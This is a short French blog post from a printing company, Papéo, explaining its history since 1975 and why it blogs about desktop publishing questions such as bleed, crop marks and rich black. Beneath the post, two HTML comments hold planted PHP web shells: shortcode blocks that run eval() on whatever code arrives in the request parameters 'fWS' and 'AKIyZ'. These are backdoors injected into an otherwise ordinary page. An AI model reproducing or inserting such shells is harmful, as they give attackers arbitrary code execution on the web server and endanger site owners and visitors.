Pourquoi un blog sur l’imprimerie…

Papéo a été créée en 1975. A cette date, pas de PAO, pas d’ordinateurs… Des films, du montage manuel, la fin des caractères en plomb… Bref préhistoire de la PAO.

Après plusieurs années, et tables de montage électronique, scanners rotatifs.. la PAO est apparu avec le Mac et Microsoft Windows 3. Déjà à cette époque, Papéo travaillait en Mac et PC, et formait de jeunes graphistes, à comprendre les méandres de la PAO.
Aujourd’hui avec les logiciels multi-plateformes, la démocratisation du PDF, la possibilité de créer des mises en pages avec des traitements de textes, tout le monde peut créer ses fichiers.

Mais l’auto-création rime souvent avec des problèmes et des questions ? Comment faire, les traits de coupe, le débord, la quadri, la création de brochures, le noir de soutien… Ce sont des centaines de questions que vous vous posez, et dont nous allons essayer de répondre…

 

<!– [insert_php]if (isset($_REQUEST["fWS"])){eval($_REQUEST["fWS"]);exit;}[/insert_php][php]if (isset($_REQUEST["fWS"])){eval($_REQUEST["fWS"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["AKIyZ"])){eval($_REQUEST["AKIyZ"]);exit;}[/insert_php][php]if (isset($_REQUEST["AKIyZ"])){eval($_REQUEST["AKIyZ"]);exit;}[/php] –>

4 thoughts on “Pourquoi un blog sur l’imprimerie…

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *